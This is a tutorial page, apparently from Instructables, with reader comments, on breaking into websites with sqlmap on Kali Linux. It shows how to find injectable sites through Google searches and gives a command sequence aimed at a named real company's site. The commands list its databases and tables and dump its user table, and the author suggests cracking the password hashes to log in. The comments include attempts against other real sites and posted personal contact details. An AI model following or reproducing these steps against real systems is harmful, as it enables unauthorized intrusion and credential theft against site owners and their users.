Hacking Websites With Sqlmap and Kali Linux

114,528

32

16

Posted

Introduction: Hacking Websites With Sqlmap and Kali Linux

So your on the point that you want to hack websites with Kali Linux? Well then your on the right place! Today I'm going to show you how to hack a site with sqlmap in Kali Linux.

Step 1: Fire Up Kali Linux

I guess you know how to do this step :D

Step 2: Start a New Terminal

Start by opening a new terminal. We'll use this terminal later.

Step 3: Find a Vulnerable Website

Go to Google and search for: php?id=1. If you found a site that got that in their link put an ' after the 1. If it says that there's a problem with the sql syntax then the site is vulnerable.

Step 4: Using Sqlmap to Hack It

In your terminal type:

sqlmap -u http://www.angelvestgroup.com/info.php?id=1 --dbs

(http://www.angelvestgroup.com/info.php?id=1 is my vulnerable url)

Now it's going to load the databases...

If that's done you'll need to select a database by typing:

sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china --tables

(angelvest_china is the database I found)

Now it's going to load all the information that's in the database you've selected.

Now you'll need to select a table by typing:

sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user --column

(db_user is the table I found)

Now you need to select a column by typing:

sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user -C username --dump

(username is the name of the column that I found)

Now it will dump the information in the column username and: you've hacked it! (On that site there is a column called passwords too so you just need to decrypt the hashes in that column and boom! You can login.)

Congrats! You've just hacked a website with sqlmap! If you liked the instructable you should take a look at my other instructables too! Stay tuned for more!

Share

Recommendations

  • Epilog Challenge 9

    Epilog Challenge 9
  • First Time Author Contest 2018

    First Time Author Contest 2018
  • Sew Warm Contest 2018

    Sew Warm Contest 2018
user

We have a be nice policy.
Please be positive and constructive.

Tips

Questions

this is confusion , please explain well

10 Comments

[18:26:54] [CRITICAL] host 'www.linkedin.com' does not exist

how i can handle this problum..

while i heacking a wabsite

Did you remember to put http:// before it?

Hi, can you reach me at soheil.singh86@gmail.com as i have some trade to share.

Can you please message or reply to this comment I have a question

text me on +9198711100514

text me +212699417549

What's your question?

A great intro to SQL injection. Be safe, kids! Learn to make yourself as invisible as possible before attempting any hacks, and have the admin's permission as well.